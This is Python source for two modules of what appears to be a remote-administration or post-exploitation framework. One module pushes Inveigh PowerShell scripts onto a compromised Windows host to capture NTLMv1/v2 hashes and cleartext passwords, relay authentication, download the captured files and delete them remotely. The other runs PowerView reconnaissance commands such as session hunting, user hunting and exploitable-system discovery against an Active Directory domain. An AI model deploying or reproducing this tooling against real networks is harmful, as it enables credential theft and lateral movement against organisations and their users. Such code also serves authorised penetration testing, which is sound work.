    self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE)
    self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE)
    self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE)
    localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)
    if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False:
        self.error("You have to give a command")
        return
    # getResults only downloads; it never touches the PowerShell session.
    if args.getResults == True:
        nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
        if nb == 0:
            self.error("No one Inveigh result file downloaded. Is Inveigh is running on the target?")
        else:
            self.success("All Inveigh results downloaded")
        return
    elif args.InvokeInveigh == True:
        self.success("Invoke-Inveigh command selected")
        pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
        # args.inveighParams is appended verbatim to the command line.
        command = "Invoke-Inveigh"+commonOptions+args.inveighParams
    elif args.InvokeInveighUnprivileged == True:
        self.success("Invoke-InveighUnprivileged command selected")
        pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Unprivileged.ps1")
        command = "Invoke-InveighUnprivileged"+commonOptions+args.inveighParams
    elif args.InvokeInveighRelay == True:
        self.success("Invoke-Relay command selected")
        pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Relay.ps1")
        command = "Invoke-Relay"+commonOptions+args.inveighParams
    elif args.StopInveigh == True:
        pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
        command = "Stop-Inveigh"
    logging.debug("The following script will be loaded on the target if needed: {0}".format(pathToScript))
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        logging.debug("Powershell script actually loaded: {0}".format(self.client.powershell[arch]['scripts_loaded']))
        if script not in self.client.powershell[arch]['scripts_loaded']:
            logging.debug("Loading {0} script on target...".format(pathToScript))
            content = open(pathToScript, 'r').read()
        else:
            logging.debug("{0} script already loaded on target".format(pathToScript))
            content = ''
    logging.debug("Executing the following inveigh command: {0}".format(command))
    output = execute_powershell_script(self, content, command, x64IfPossible=True, script_name=script)
    if not output:
        self.error("No results")
        return
    self.success("Output: \n%s\n" % output)
    # After a confirmed stop, collect the result files and remove them remotely.
    if args.StopInveigh == True and "exited at " in str(output):
        self.success("Inveigh is stopped")
        self.downloadInveighFiles(remote_temp_folder, localFolder)
        self.removeRemoteInveighFiles()
def run(self, args):
    """Run the PowerView cmdlet selected by the module's flags (or args.command).

    Args:
        args: parsed module arguments. One selector flag picks a cmdlet; when
            none is set, args.command is used as the raw command string.

    Returns:
        None; output goes to self.success, errors to self.error.
    """
    script = 'powerview'
    command = ""
    if args.list_available_commands:
        self.log(self.commands_available)
        return
    # check if file has been already uploaded to the target
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        if script not in self.client.powershell[arch]['scripts_loaded']:
            logging.debug("Loading PowerView.ps1 script on target...")
            content = open(
                os.path.join(ROOT, "external", "PowerSploit", "Recon",
                             "PowerView.ps1"), 'r').read()
        else:
            logging.debug("PowerView.ps1 script already loaded on target")
            content = ''
    # Flag -> cmdlet mapping. NOTE(review): GetProxy sits in its own `if`,
    # so any flag of the following if/elif chain overrides it. Argument
    # values (GetNetGroupWith, *On, FindGPOLocation) are interpolated
    # unquoted into the PowerShell command line.
    if args.GetProxy == True:
        command = "Get-Proxy"
    if args.GetNetComputer == True:
        command = "Get-NetComputer"
    elif args.GetNetMssql == True:
        command = "Get-NetComputer -SPN mssql*"
    elif args.GetNetSubnet == True:
        command = "Get-NetSubnet"
    elif args.GetNetGroup == True:
        command = "Get-NetGroup"
    elif args.GetNetGroupWith != None:
        command = "Get-NetGroup -GroupName *{0}* -FullData".format(
            args.GetNetGroupWith)
    elif args.GetNetGroupMember == True:
        command = "Get-NetGroupMember"
    elif args.GetNetFileServer == True:
        command = "Get-NetFileServer"
    elif args.GetDFSshare == True:
        command = "Get-DFSshare"
    elif args.GetNetGPO == True:
        command = "Get-NetGPO"
    elif args.GetNetGPOGroup == True:
        command = "Get-NetGPOGroup"
    elif args.FindGPOLocation != None:
        command = "Find-GPOLocation -UserName {0}".format(
            args.FindGPOLocation)
    elif args.GetNetLocalGroup == True:
        command = "Get-NetLocalGroup"
    elif args.GetNetLoggedon == True:
        command = "Get-NetLoggedon"
    elif args.GetNetLoggedonOn != None:
        command = "Get-NetLoggedon -ComputerName {0}".format(
            args.GetNetLoggedonOn)
    elif args.GetNetSession == True:
        command = "Get-NetSession"
    elif args.GetNetSessionOn != None:
        command = "Get-NetSession -ComputerName {0}".format(
            args.GetNetSessionOn)
    elif args.GetNetRDPSession == True:
        command = "Get-NetRDPSession"
    elif args.GetNetRDPSessionOn != None:
        command = "Get-NetRDPSession -ComputerName {0}".format(
            args.GetNetRDPSessionOn)
    elif args.GetLastLoggedOn == True:
        command = "Get-LastLoggedOn"
    elif args.GetLastLoggedOnOn != None:
        command = "Get-LastLoggedOn -ComputerName {0}".format(
            args.GetLastLoggedOnOn)
    elif args.InvokeUserHunterCheck == True:
        command = "Invoke-UserHunter -CheckAccess"
    elif args.InvokeUserHunterForest == True:
        command = "Invoke-UserHunter -SearchForest"
    elif args.GetExploitableSystem == True:
        command = "Get-ExploitableSystem | Format-Table -AutoSize"
    # Fall back to the free-form command only when no flag selected one.
    if command == "":
        if args.command == None:
            self.error("You have to choose a powerview command!")
            return
        else:
            command = args.command
    logging.debug(
        "Executing the following powerview command: {0}".format(command))
    output = execute_powershell_script(self, content, command,
                                       script_name=script)
    if not output:
        self.error("No results")
        return
    self.success("Output: \n%s\n" % output)